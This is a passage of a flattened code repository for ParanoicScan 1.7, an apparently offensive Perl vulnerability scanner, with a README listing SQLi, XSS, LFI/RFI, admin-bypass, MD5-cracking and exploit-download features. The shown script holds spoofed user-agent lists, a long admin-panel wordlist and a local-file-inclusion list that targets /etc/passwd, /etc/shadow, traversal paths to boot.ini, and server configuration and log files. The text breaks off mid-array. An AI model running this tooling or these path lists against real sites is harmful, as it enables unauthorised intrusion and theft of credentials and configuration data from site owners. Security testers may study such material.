├── paranoic.zip ├── ParanoicScan17.zip ├── .gitattributes ├── README.md ├── .gitignore └── paranoic.pl /paranoic.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/akiraaisha/ParanoicScan/HEAD/paranoic.zip -------------------------------------------------------------------------------- /ParanoicScan17.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/akiraaisha/ParanoicScan/HEAD/ParanoicScan17.zip -------------------------------------------------------------------------------- /.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto 3 | 4 | # Custom for Visual Studio 5 | *.cs diff=csharp 6 | *.sln merge=union 7 | *.csproj merge=union 8 | *.vbproj merge=union 9 | *.fsproj merge=union 10 | *.dbproj merge=union 11 | 12 | # Standard to msysgit 13 | *.doc diff=astextplain 14 | *.DOC diff=astextplain 15 | *.docx diff=astextplain 16 | *.DOCX diff=astextplain 17 | *.dot diff=astextplain 18 | *.DOT diff=astextplain 19 | *.pdf diff=astextplain 20 | *.PDF diff=astextplain 21 | *.rtf diff=astextplain 22 | *.RTF diff=astextplain 23 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ParanoicScan 2 | ============ 3 | 4 | Vulnerability Scanner 5 | 6 | As the first program of 2014 I bring you the new version of my ParanoicScan in its version 1.7, while some people stole the source code of the previous version of this program code, the issue is that not bother me that you used the code but only changed him the program name and the name of the author did not bother to change the names of the variables only changed the name of the author, for a moment hesitate to continue to share the code of this 2-year project working but despite that I continue to share the code of this program, besides explorer (of perlenespanol) recommended me to do another version of this program was to demonstrate that the real author so that the program has the dual function and arrange countless bugs that were in all the code.
7 | 8 | [++] Old Options
9 | 10 | Google & Bing Scanner that also scan :
11 | 12 | * XSS
13 | * SQL GET / POST
14 | * SQL GET
15 | * SQL GET + Admin
16 | * Directory listing
17 | * MSSQL
18 | * Jet Database
19 | * Oracle
20 | * LFI
21 | * RFI
22 | * Full Source Discloure
23 | * HTTP Information
24 | * SQLi Scanner
25 | * Bypass Admin
26 | * Exploit FSD Manager
27 | * Paths Finder
28 | * IP Locate
29 | * Crack MD5
30 | * Panel Finder
31 | * Console
32 | 33 | [++] Fixes
34 | 35 | [+] Refresh of existing pages to crack md5
36 | [+] Error scanner fsd
37 | [+] Http error scanner scan
38 | [+] Spaces between text too annoying
39 | [+] Added array to bypass
40 | [+] Failed to read from file
41 | 42 | [++] New options
43 | 44 | [+] Generate all logs in a html file
45 | [+] Incorporates random and new useragent
46 | [+] Multi encoder / decoder :
47 | 48 | * Ascii
49 | * Hex
50 | * Url
51 | * Bin To Text & Text To Bin
52 | 53 | [+] PortScanner
54 | [+] HTTP FingerPrinting
55 | [+] CSRF Tool
56 | [+] Scan XSS
57 | [+] Generator for XSS Bypass
58 | [+] Generator links to tiny url
59 | [+] Finder and downloader exploits on Exploit-DB
60 | [+] Mysql Manager
61 | [+] Tools LFI
62 | 63 | A video with examples of usage
64 | 65 | http://www.youtube.com/watch?v=-M59SEVTevc
66 | 67 | Available for download here :
68 | 69 | https://github.com/DoddyHackman/ParanoicScan
70 | https://code.google.com/p/paranoicscan/source/browse/
71 | https://sourceforge.net/projects/paranoicscan/?source=directory
72 | http://pastebin.com/yKfJhCT2
73 | 74 | Good Bye
75 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | ################# 2 | ## Eclipse 3 | ################# 4 | 5 | *.pydevproject 6 | .project 7 | .metadata 8 | bin/ 9 | tmp/ 10 | *.tmp 11 | *.bak 12 | *.swp 13 | *~.nib 14 | local.properties 15 | .classpath 16 | .settings/ 17 | .loadpath 18 | 19 | # External tool builders 20 | .externalToolBuilders/ 21 | 22 | # Locally stored "Eclipse launch configurations" 23 | *.launch 24 | 25 | # CDT-specific 26 | .cproject 27 | 28 | # PDT-specific 29 | .buildpath 30 | 31 | 32 | ################# 33 | ## Visual Studio 34 | ################# 35 | 36 | ## Ignore Visual Studio temporary files, build results, and 37 | ## files generated by popular Visual Studio add-ons. 38 | 39 | # User-specific files 40 | *.suo 41 | *.user 42 | *.sln.docstates 43 | 44 | # Build results 45 | 46 | [Dd]ebug/ 47 | [Rr]elease/ 48 | x64/ 49 | build/ 50 | [Bb]in/ 51 | [Oo]bj/ 52 | 53 | # MSTest test Results 54 | [Tt]est[Rr]esult*/ 55 | [Bb]uild[Ll]og.* 56 | 57 | *_i.c 58 | *_p.c 59 | *.ilk 60 | *.meta 61 | *.obj 62 | *.pch 63 | *.pdb 64 | *.pgc 65 | *.pgd 66 | *.rsp 67 | *.sbr 68 | *.tlb 69 | *.tli 70 | *.tlh 71 | *.tmp 72 | *.tmp_proj 73 | *.log 74 | *.vspscc 75 | *.vssscc 76 | .builds 77 | *.pidb 78 | *.log 79 | *.scc 80 | 81 | # Visual C++ cache files 82 | ipch/ 83 | *.aps 84 | *.ncb 85 | *.opensdf 86 | *.sdf 87 | *.cachefile 88 | 89 | # Visual Studio profiler 90 | *.psess 91 | *.vsp 92 | *.vspx 93 | 94 | # Guidance Automation Toolkit 95 | *.gpState 96 | 97 | # ReSharper is a .NET coding add-in 98 | _ReSharper*/ 99 | *.[Rr]e[Ss]harper 100 | 101 | # TeamCity is a build add-in 102 | _TeamCity* 103 | 104 | # DotCover is a Code Coverage Tool 105 | *.dotCover 106 | 107 | # NCrunch 108 | *.ncrunch* 109 | .*crunch*.local.xml 110 | 111 | # Installshield output folder 112 | [Ee]xpress/ 113 | 114 | # DocProject is a documentation generator add-in 115 | DocProject/buildhelp/ 116 | DocProject/Help/*.HxT 117 | DocProject/Help/*.HxC 118 | DocProject/Help/*.hhc 119 | DocProject/Help/*.hhk 120 | DocProject/Help/*.hhp 121 | DocProject/Help/Html2 122 | DocProject/Help/html 123 | 124 | # Click-Once directory 125 | publish/ 126 | 127 | # Publish Web Output 128 | *.Publish.xml 129 | *.pubxml 130 | 131 | # NuGet Packages Directory 132 | ## TODO: If you have NuGet Package Restore enabled, uncomment the next line 133 | #packages/ 134 | 135 | # Windows Azure Build Output 136 | csx 137 | *.build.csdef 138 | 139 | # Windows Store app package directory 140 | AppPackages/ 141 | 142 | # Others 143 | sql/ 144 | *.Cache 145 | ClientBin/ 146 | [Ss]tyle[Cc]op.* 147 | ~$* 148 | *~ 149 | *.dbmdl 150 | *.[Pp]ublish.xml 151 | *.pfx 152 | *.publishsettings 153 | 154 | # RIA/Silverlight projects 155 | Generated_Code/ 156 | 157 | # Backup & report files from converting an old project file to a newer 158 | # Visual Studio version. Backup files are not needed, because we have git ;-) 159 | _UpgradeReport_Files/ 160 | Backup*/ 161 | UpgradeLog*.XML 162 | UpgradeLog*.htm 163 | 164 | # SQL Server files 165 | App_Data/*.mdf 166 | App_Data/*.ldf 167 | 168 | ############# 169 | ## Windows detritus 170 | ############# 171 | 172 | # Windows image file caches 173 | Thumbs.db 174 | ehthumbs.db 175 | 176 | # Folder config file 177 | Desktop.ini 178 | 179 | # Recycle Bin used on file shares 180 | $RECYCLE.BIN/ 181 | 182 | # Mac crap 183 | .DS_Store 184 | 185 | 186 | ############# 187 | ## Python 188 | ############# 189 | 190 | *.py[co] 191 | 192 | # Packages 193 | *.egg 194 | *.egg-info 195 | dist/ 196 | build/ 197 | eggs/ 198 | parts/ 199 | var/ 200 | sdist/ 201 | develop-eggs/ 202 | .installed.cfg 203 | 204 | # Installer logs 205 | pip-log.txt 206 | 207 | # Unit test / coverage reports 208 | .coverage 209 | .tox 210 | 211 | #Translations 212 | *.mo 213 | 214 | #Mr Developer 215 | .mr.developer.cfg 216 | -------------------------------------------------------------------------------- /paranoic.pl: -------------------------------------------------------------------------------- 1 | #!usr/bin/perl 2 | ################################################################################# 3 | #This software is Copyright (c) 2014 by Doddy Hackman. 4 | # 5 | #This is free software, licensed under: 6 | # 7 | # The Artistic License 1.0 8 | # 9 | #The Artistic License 10 | # 11 | #Preamble 12 | # 13 | #The intent of this document is to state the conditions under which a Package 14 | #may be copied, such that the Copyright Holder maintains some semblance of 15 | #artistic control over the development of the package, while giving the users of 16 | #the package the right to use and distribute the Package in a more-or-less 17 | #customary fashion, plus the right to make reasonable modifications. 18 | # 19 | #Definitions: 20 | # 21 | # - "Package" refers to the collection of files distributed by the Copyright 22 | # Holder, and derivatives of that collection of files created through 23 | # textual modification. 24 | # - "Standard Version" refers to such a Package if it has not been modified, 25 | # or has been modified in accordance with the wishes of the Copyright 26 | # Holder. 27 | # - "Copyright Holder" is whoever is named in the copyright or copyrights for 28 | # the package. 29 | # - "You" is you, if you're thinking about copying or distributing this Package. 30 | # - "Reasonable copying fee" is whatever you can justify on the basis of media 31 | # cost, duplication charges, time of people involved, and so on. (You will 32 | # not be required to justify it to the Copyright Holder, but only to the 33 | # computing community at large as a market that must bear the fee.) 34 | # - "Freely Available" means that no fee is charged for the item itself, though 35 | # there may be fees involved in handling the item. It also means that 36 | # recipients of the item may redistribute it under the same conditions they 37 | # received it. 38 | # 39 | #1. You may make and give away verbatim copies of the source form of the 40 | #Standard Version of this Package without restriction, provided that you 41 | #duplicate all of the original copyright notices and associated disclaimers. 42 | # 43 | #2. You may apply bug fixes, portability fixes and other modifications derived 44 | #from the Public Domain or from the Copyright Holder. A Package modified in such 45 | #a way shall still be considered the Standard Version. 46 | # 47 | #3. You may otherwise modify your copy of this Package in any way, provided that 48 | #you insert a prominent notice in each changed file stating how and when you 49 | #changed that file, and provided that you do at least ONE of the following: 50 | # 51 | # a) place your modifications in the Public Domain or otherwise make them 52 | # Freely Available, such as by posting said modifications to Usenet or an 53 | # equivalent medium, or placing the modifications on a major archive site 54 | # such as ftp.uu.net, or by allowing the Copyright Holder to include your 55 | # modifications in the Standard Version of the Package. 56 | # 57 | # b) use the modified Package only within your corporation or organization. 58 | # 59 | # c) rename any non-standard executables so the names do not conflict with 60 | # standard executables, which must also be provided, and provide a separate 61 | # manual page for each non-standard executable that clearly documents how it 62 | # differs from the Standard Version. 63 | # 64 | # d) make other distribution arrangements with the Copyright Holder. 65 | # 66 | #4. You may distribute the programs of this Package in object code or executable 67 | #form, provided that you do at least ONE of the following: 68 | # 69 | # a) distribute a Standard Version of the executables and library files, 70 | # together with instructions (in the manual page or equivalent) on where to 71 | # get the Standard Version. 72 | # 73 | # b) accompany the distribution with the machine-readable source of the Package 74 | # with your modifications. 75 | # 76 | # c) accompany any non-standard executables with their corresponding Standard 77 | # Version executables, giving the non-standard executables non-standard 78 | # names, and clearly documenting the differences in manual pages (or 79 | # equivalent), together with instructions on where to get the Standard 80 | # Version. 81 | # 82 | # d) make other distribution arrangements with the Copyright Holder. 83 | # 84 | #5. You may charge a reasonable copying fee for any distribution of this 85 | #Package. You may charge any fee you choose for support of this Package. You 86 | #may not charge a fee for this Package itself. However, you may distribute this 87 | #Package in aggregate with other (possibly commercial) programs as part of a 88 | #larger (possibly commercial) software distribution provided that you do not 89 | #advertise this Package as a product of your own. 90 | # 91 | #6. The scripts and library files supplied as input to or produced as output 92 | #from the programs of this Package do not automatically fall under the copyright 93 | #of this Package, but belong to whomever generated them, and may be sold 94 | #commercially, and may be aggregated with this Package. 95 | # 96 | #7. C or perl subroutines supplied by you and linked into this Package shall not 97 | #be considered part of this Package. 98 | # 99 | #8. The name of the Copyright Holder may not be used to endorse or promote 100 | #products derived from this software without specific prior written permission. 101 | # 102 | #9. THIS PACKAGE IS PROVIDED "AS IS" AND WITHOUT ANY EXPRESS OR IMPLIED 103 | #WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF 104 | #MERCHANTIBILITY AND FITNESS FOR A PARTICULAR PURPOSE. 105 | # 106 | #The End 107 | ################################################################################# 108 | #Paranoic Scan 1.7 109 | #(C) Doddy Hackman 2014 110 | #Necessary modules 111 | #http://search.cpan.org/~animator/Color-Output-1.05/Output.pm 112 | #ppm install http://trouchelle.com/ppm/Color-Output.ppd 113 | #ppm install http://www.eekboek.nl/dl/ppms/Crypt-SSLeay.ppd 114 | #http://search.cpan.org/~exiftool/Image-ExifTool-9.27/lib/Image/ExifTool.pod 115 | #http://search.cpan.org/~timb/DBI-1.630/DBI.pm 116 | #http://search.cpan.org/~capttofu/DBD-mysql-4.025/lib/DBD/mysql.pm 117 | #The arrays are a collection of several I found on the web 118 | # 119 | #[++] Old Options 120 | # 121 | #Google & Bing Scanner that also scan : 122 | # 123 | # * XSS 124 | # * SQL GET / POST 125 | # * SQL GET 126 | # * SQL GET + Admin 127 | # * Directory listing 128 | # * MSSQL 129 | # * Jet Database 130 | # * Oracle 131 | # * LFI 132 | # * RFI 133 | # * Full Source Discloure 134 | # * HTTP Information 135 | # * SQLi Scanner 136 | # * Bypass Admin 137 | # * Exploit FSD Manager 138 | # * Paths Finder 139 | # * Locate IP 140 | # * Crack MD5 141 | # * Panel Finder 142 | # * Console 143 | # 144 | #[++] Fixes 145 | # 146 | #[+] Refresh of existing pages to crack md5 147 | #[+] Error scanner fsd 148 | #[+] Http error scanner scan 149 | #[+] Spaces between text too annoying 150 | #[+] Added array to bypass 151 | #[+] Failed to read from file 152 | #[+] Fixed google & bing scanner 153 | # 154 | #[++] New options 155 | # 156 | #[+] Generate all logs in a html file 157 | #[+] Incorporates random and new useragent 158 | #[+] Multi encoder / decoder : 159 | # 160 | # * Ascii 161 | # * Hex 162 | # * Url 163 | # * Bin To Text & Text To Bin 164 | # 165 | #[+] PortScanner 166 | #[+] HTTP FingerPrinting 167 | #[+] CSRF Tool 168 | #[+] Scan XSS 169 | #[+] Generator for XSS Bypass 170 | #[+] Generator tiny url links to 171 | #[+] Finder and downloader exploits on Exploit-DB 172 | #[+] Mysql Manager 173 | #[+] Tools LFI 174 | # 175 | ################################################################################# 176 | 177 | use Color::Output; 178 | Color::Output::Init; 179 | use LWP::UserAgent; 180 | use URI::Escape; 181 | use IO::Socket; 182 | use URI::Split qw(uri_split); 183 | use URI::Escape; 184 | use File::Basename; 185 | use HTML::Form; 186 | use HTML::Parser; 187 | use HTML::LinkExtor; 188 | use HTML::Form; 189 | use Time::HiRes "usleep"; 190 | use Image::ExifTool; 191 | use Digest::MD5 qw(md5_hex); 192 | use MIME::Base64; 193 | use DBI; 194 | use Cwd; 195 | 196 | $|++; 197 | 198 | ## 199 | 200 | ##Arrays 201 | 202 | my @agents = ( 203 | 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0', 204 | 'Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14', 205 | 'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36', 206 | 'Mozilla/5.0 (compatible; MSIE 10.6; Windows NT 6.1; Trident/5.0; InfoPath.2; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727) 3gpp-gba UNTRUSTED/1.0', 207 | 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1', 208 | 'Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))', 209 | 'Mozilla/5.0 (Windows NT 6.0; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.14', 210 | 'Mozilla/5.0 (Windows; U; Windows NT 6.1; tr-TR) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27' 211 | ); 212 | 213 | my @paneles = ( 214 | 'admin/admin.asp', 'admin/login.asp', 215 | 'admin/index.asp', 'admin/admin.aspx', 216 | 'admin/login.aspx', 'admin/index.aspx', 217 | 'admin/webmaster.asp', 'admin/webmaster.aspx', 218 | 'asp/admin/index.asp', 'asp/admin/index.aspx', 219 | 'asp/admin/admin.asp', 'asp/admin/admin.aspx', 220 | 'asp/admin/webmaster.asp', 'asp/admin/webmaster.aspx', 221 | 'admin/', 'login.asp', 222 | 'login.aspx', 'admin.asp', 223 | 'admin.aspx', 'webmaster.aspx', 224 | 'webmaster.asp', 'login/index.asp', 225 | 'login/index.aspx', 'login/login.asp', 226 | 'login/login.aspx', 'login/admin.asp', 227 | 'login/admin.aspx', 'administracion/index.asp', 228 | 'administracion/index.aspx', 'administracion/login.asp', 229 | 'administracion/login.aspx', 'administracion/webmaster.asp', 230 | 'administracion/webmaster.aspx', 'administracion/admin.asp', 231 | 'administracion/admin.aspx', 'php/admin/', 232 | 'admin/admin.php', 'admin/index.php', 233 | 'admin/login.php', 'admin/system.php', 234 | 'admin/ingresar.php', 'admin/administrador.php', 235 | 'admin/default.php', 'administracion/', 236 | 'administracion/index.php', 'administracion/login.php', 237 | 'administracion/ingresar.php', 'administracion/admin.php', 238 | 'administration/', 'administration/index.php', 239 | 'administration/login.php', 'administrator/index.php', 240 | 'administrator/login.php', 'administrator/system.php', 241 | 'system/', 'system/login.php', 242 | 'admin.php', 'login.php', 243 | 'administrador.php', 'administration.php', 244 | 'administrator.php', 'admin1.html', 245 | 'admin1.php', 'admin2.php', 246 | 'admin2.html', 'yonetim.php', 247 | 'yonetim.html', 'yonetici.php', 248 | 'yonetici.html', 'adm/', 249 | 'admin/account.php', 'admin/account.html', 250 | 'admin/index.html', 'admin/login.html', 251 | 'admin/home.php', 'admin/controlpanel.html', 252 | 'admin/controlpanel.php', 'admin.html', 253 | 'admin/cp.php', 'admin/cp.html', 254 | 'cp.php', 'cp.html', 255 | 'administrator/', 'administrator/index.html', 256 | 'administrator/login.html', 'administrator/account.html', 257 | 'administrator/account.php', 'administrator.html', 258 | 'login.html', 'modelsearch/login.php', 259 | 'moderator.php', 'moderator.html', 260 | 'moderator/login.php', 'moderator/login.html', 261 | 'moderator/admin.php', 'moderator/admin.html', 262 | 'moderator/', 'account.php', 263 | 'account.html', 'controlpanel/', 264 | 'controlpanel.php', 'controlpanel.html', 265 | 'admincontrol.php', 'admincontrol.html', 266 | 'adminpanel.php', 'adminpanel.html', 267 | 'admin1.asp', 'admin2.asp', 268 | 'yonetim.asp', 'yonetici.asp', 269 | 'admin/account.asp', 'admin/home.asp', 270 | 'admin/controlpanel.asp', 'admin/cp.asp', 271 | 'cp.asp', 'administrator/index.asp', 272 | 'administrator/login.asp', 'administrator/account.asp', 273 | 'administrator.asp', 'modelsearch/login.asp', 274 | 'moderator.asp', 'moderator/login.asp', 275 | 'moderator/admin.asp', 'account.asp', 276 | 'controlpanel.asp', 'admincontrol.asp', 277 | 'adminpanel.asp', 'fileadmin/', 278 | 'fileadmin.php', 'fileadmin.asp', 279 | 'fileadmin.html', 'administration.html', 280 | 'sysadmin.php', 'sysadmin.html', 281 | 'phpmyadmin/', 'myadmin/', 282 | 'sysadmin.asp', 'sysadmin/', 283 | 'ur-admin.asp', 'ur-admin.php', 284 | 'ur-admin.html', 'ur-admin/', 285 | 'Server.php', 'Server.html', 286 | 'Server.asp', 'Server/', 287 | 'wp-admin/', 'administr8.php', 288 | 'administr8.html', 'administr8/', 289 | 'administr8.asp', 'webadmin/', 290 | 'webadmin.php', 'webadmin.asp', 291 | 'webadmin.html', 'administratie/', 292 | 'admins/', 'admins.php', 293 | 'admins.asp', 'admins.html', 294 | 'administrivia/', 'Database_Administration/', 295 | 'WebAdmin/', 'useradmin/', 296 | 'sysadmins/', 'admin1/', 297 | 'system-administration/', 'administrators/', 298 | 'pgadmin/', 'directadmin/', 299 | 'staradmin/', 'ServerAdministrator/', 300 | 'SysAdmin/', 'administer/', 301 | 'LiveUser_Admin/', 'sys-admin/', 302 | 'typo3/', 'panel/', 303 | 'cpanel/', 'cPanel/', 304 | 'cpanel_file/', 'platz_login/', 305 | 'rcLogin/', 'blogindex/', 306 | 'formslogin/', 'autologin/', 307 | 'support_login/', 'meta_login/', 308 | 'manuallogin/', 'simpleLogin/', 309 | 'loginflat/', 'utility_login/', 310 | 'showlogin/', 'memlogin/', 311 | 'members/', 'login-redirect/', 312 | 'sub-login/', 'wp-login/', 313 | 'login1/', 'dir-login/', 314 | 'login_db/', 'xlogin/', 315 | 'smblogin/', 'customer_login/', 316 | 'UserLogin/', 'login-us/', 317 | 'acct_login/', 'admin_area/', 318 | 'bigadmin/', 'project-admins/', 319 | 'phppgadmin/', 'pureadmin/', 320 | 'sql-admin/', 'radmind/', 321 | 'openvpnadmin/', 'wizmysqladmin/', 322 | 'vadmind/', 'ezsqliteadmin/', 323 | 'hpwebjetadmin/', 'newsadmin/', 324 | 'adminpro/', 'Lotus_Domino_Admin/', 325 | 'bbadmin/', 'vmailadmin/', 326 | 'Indy_admin/', 'ccp14admin/', 327 | 'irc-macadmin/', 'banneradmin/', 328 | 'sshadmin/', 'phpldapadmin/', 329 | 'macadmin/', 'administratoraccounts/', 330 | 'admin4_account/', 'admin4_colon/', 331 | 'radmind-1/', 'Super-Admin/', 332 | 'AdminTools/', 'cmsadmin/', 333 | 'SysAdmin2/', 'globes_admin/', 334 | 'cadmins/', 'phpSQLiteAdmin/', 335 | 'navSiteAdmin/', 'server_admin_small/', 336 | 'logo_sysadmin/', 'server/', 337 | 'database_administration/', 'power_user/', 338 | 'system_administration/', 'ss_vms_admin_sm/' 339 | ); 340 | 341 | #my @files = ("/opt/lampp/htdocs/fofo.txt","/opt/lampp/htdocs/fofo.txt"); 342 | 343 | my @files = ( 344 | 'C:/xampp/htdocs/aca.txt', 345 | '../lfi.php', 346 | 'C:/xampp/htdocs/admin.php', 347 | 'C:/xampp/htdocs/leer.txt', 348 | '../../../boot.ini', 349 | '../../../../boot.ini', 350 | '../../../../../boot.ini', 351 | '../../../../../../boot.ini', 352 | '/etc/passwd', 353 | '/etc/shadow', 354 | '/etc/shadow~', 355 | '/etc/hosts', 356 | '/etc/motd', 357 | '/etc/apache/apache.conf', 358 | '/etc/fstab', 359 | '/etc/apache2/apache2.conf', 360 | '/etc/apache/httpd.conf', 361 | '/etc/httpd/conf/httpd.conf', 362 | '/etc/apache2/httpd.conf', 363 | '/etc/apache2/sites-available/default', 364 | '/etc/mysql/my.cnf', 365 | '/etc/my.cnf', 366 | '/etc/sysconfig/network-scripts/ifcfg-eth0', 367 | '/etc/redhat-release', 368 | '/etc/httpd/conf.d/php.conf', 369 | '/etc/pam.d/proftpd', 370 | '/etc/phpmyadmin/config.inc.php', 371 | '/var/www/config.php', 372 | '/etc/httpd/logs/error_log', 373 | '/etc/httpd/logs/error.log', 374 | '/etc/httpd/logs/access_log', 375 | '/etc/httpd/logs/access.log', 376 | '/var/log/apache/error_log', 377 | '/var/log/apache/error.log', 378 | '/var/log/apache/access_log', 379 | '/var/log/apache/access.log', 380 | '/var/log/apache2/error_log', 381 | '/var/log/apache2/error.log', 382 | '/var/log/apache2/access_log', 383 | '/var/log/apache2/access.log', 384 | '/var/www/logs/error_log', 385 | '/var/www/logs/error.log', 386 | '/var/www/logs/access_log', 387 | '/var/www/logs/access.log', 388 | '/usr/local/apache/logs/error_log', 389 | '/usr/local/apache/logs/error.log', 390 | '/usr/local/apache/logs/access_log', 391 | '/usr/local/apache/logs/access.log', 392 | '/var/log/error_log', 393 | '/var/log/error.log', 394 | '/var/log/access_log', 395 | '/var/log/access.log', 396 | '/etc/group', 397 | '/etc/security/group', 398 | '/etc/security/passwd', 399 | '/etc/security/user', 400 | '/etc/security/environ', 401 | '/etc/security/limits', 402 | '/usr/lib/security/mkuser.default', 403 | '/apache/logs/access.log', 404 | '/apache/logs/error.log', 405 | '/etc/httpd/logs/acces_log', 406 | '/etc/httpd/logs/acces.log', 407 | '/var/log/httpd/access_log', 408 | '/var/log/httpd/error_log', 409 | '/apache2/logs/error.log', 410 | '/apache2/logs/access.log', 411 | '/logs/error.log', 412 | '/logs/access.log', 413 | '/usr/local/apache2/logs/access_log', 414 | '/usr/local/apache2/logs/access.log', 415 | '/usr/local/apache2/logs/error_log', 416 | '/usr/local/apache2/logs/error.log', 417 | '/var/log/httpd/access.log', 418 | '/var/log/httpd/error.log', 419 | '/opt/lampp/logs/access_log', 420 | '/opt/lampp/logs/error_log', 421 | '/opt/xampp/logs/access_log', 422 | '/opt/xampp/logs/error_log', 423 | '/opt/lampp/logs/access.log', 424 | '/opt/lampp/logs/error.log', 425 | '/opt/xampp/logs/access.log', 426 | '/opt/xampp/logs/error.log', 427 | 'C:\ProgramFiles\ApacheGroup\Apache\logs\access.log', 428 | 'C:\ProgramFiles\ApacheGroup\Apache\logs\error.log', 429 | '/usr/local/apache/conf/httpd.conf', 430 | '/usr/local/apache2/conf/httpd.conf', 431 | '/etc/apache/conf/httpd.conf', 432 | '/usr/local/etc/apache/conf/httpd.conf', 433 | '/usr/local/apache/httpd.conf', 434 | '/usr/local/apache2/httpd.conf', 435 | '/usr/local/httpd/conf/httpd.conf', 436 | '/usr/local/etc/apache2/conf/httpd.conf', 437 | '/usr/local/etc/httpd/conf/httpd.conf', 438 | '/usr/apache2/conf/httpd.conf', 439 | '/usr/apache/conf/httpd.conf', 440 | '/usr/local/apps/apache2/conf/httpd.conf', 441 | '/usr/local/apps/apache/conf/httpd.conf', 442 | '/etc/apache2/conf/httpd.conf', 443 | '/etc/http/conf/httpd.conf', 444 | '/etc/httpd/httpd.conf', 445 | '/etc/http/httpd.conf', 446 | '/etc/httpd.conf', 447 | '/opt/apache/conf/httpd.conf', 448 | '/opt/apache2/conf/httpd.conf', 449 | '/var/www/conf/httpd.conf', 450 | '/private/etc/httpd/httpd.conf', 451 | '/private/etc/httpd/httpd.conf.default', 452 | '/Volumes/webBackup/opt/apache2/conf/httpd.conf', 453 | '/Volumes/webBackup/private/etc/httpd/httpd.conf', 454 | '/Volumes/webBackup/private/etc/httpd/httpd.conf.default', 455 | 'C:\ProgramFiles\ApacheGroup\Apache\conf\httpd.conf', 456 | 'C:\ProgramFiles\ApacheGroup\Apache2\conf\httpd.conf', 457 | 'C:\ProgramFiles\xampp\apache\conf\httpd.conf', 458 | '/usr/local/php/httpd.conf.php', 459 | '/usr/local/php4/httpd.conf.php', 460 | '/usr/local/php5/httpd.conf.php', 461 | '/usr/local/php/httpd.conf', 462 | '/usr/local/php4/httpd.conf', 463 | '/usr/local/php5/httpd.conf', 464 | '/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf', 465 | '/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf', 466 | '/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf', 467 | '/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php', 468 | '/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php', 469 | '/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php', 470 | '/usr/local/etc/apache/vhosts.conf', 471 | '/etc/php.ini', 472 | '/bin/php.ini', 473 | '/etc/httpd/php.ini', 474 | '/usr/lib/php.ini', 475 | '/usr/lib/php/php.ini', 476 | '/usr/local/etc/php.ini', 477 | '/usr/local/lib/php.ini', 478 | '/usr/local/php/lib/php.ini', 479 | '/usr/local/php4/lib/php.ini', 480 | '/usr/local/php5/lib/php.ini', 481 | '/usr/local/apache/conf/php.ini', 482 | '/etc/php4.4/fcgi/php.ini', 483 | '/etc/php4/apache/php.ini', 484 | '/etc/php4/apache2/php.ini', 485 | '/etc/php5/apache/php.ini', 486 | '/etc/php5/apache2/php.ini', 487 | '/etc/php/php.ini', 488 | '/etc/php/php4/php.ini', 489 | '/etc/php/apache/php.ini', 490 | '/etc/php/apache2/php.ini', 491 | '/web/conf/php.ini', 492 | '/usr/local/Zend/etc/php.ini', 493 | '/opt/xampp/etc/php.ini', 494 | '/var/local/www/conf/php.ini', 495 | '/etc/php/cgi/php.ini', 496 | '/etc/php4/cgi/php.ini', 497 | '/etc/php5/cgi/php.ini', 498 | 'c:\php5\php.ini', 499 | 'c:\php4\php.ini', 500 | 'c:\php\php.ini', 501 | 'c:\PHP\php.ini', 502 | 'c:\WINDOWS\php.ini', 503 | 'c:\WINNT\php.ini', 504 | 'c:\apache\php\php.ini', 505 | 'c:\xampp\apache\bin\php.ini', 506 | 'c:\NetServer\bin\stable\apache\php.ini', 507 | 'c:\home2\bin\stable\apache\php.ini', 508 | 'c:\home\bin\stable\apache\php.ini', 509 | '/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini', 510 | '/usr/local/cpanel/logs', 511 | '/usr/local/cpanel/logs/stats_log', 512 | '/usr/local/cpanel/logs/access_log', 513 | '/usr/local/cpanel/logs/error_log', 514 | '/usr/local/cpanel/logs/license_log', 515 | '/usr/local/cpanel/logs/login_log', 516 | '/var/cpanel/cpanel.config', 517 | '/var/log/mysql/mysql-bin.log', 518 | '/var/log/mysql.log', 519 | '/var/log/mysqlderror.log', 520 | '/var/log/mysql/mysql.log', 521 | '/var/log/mysql/mysql-slow.log', 522 | '/var/mysql.log', 523 | '/var/lib/mysql/my.cnf', 524 | 'C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err', 525 | 'C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log', 526 | 'C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err', 527 | 'C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql-bin.log', 528 | 'C:\ProgramFiles\MySQL\data\hostname.err', 529 | 'C:\ProgramFiles\MySQL\data\mysql.log', 530 | 'C:\ProgramFiles\MySQL\data\mysql.err', 531 | 'C:\ProgramFiles\MySQL\data\mysql-bin.log', 532 | 'C:\MySQL\data\hostname.err', 533 | 'C:\MySQL\data\mysql.log', 534 | 'C:\MySQL\data\mysql.err', 535 | 'C:\MySQL\data\mysql-bin.log', 536 | 'C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini', 537 | 'C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf', 538 | 'C:\ProgramFiles\MySQL\my.ini', 539 | 'C:\ProgramFiles\MySQL\my.cnf', 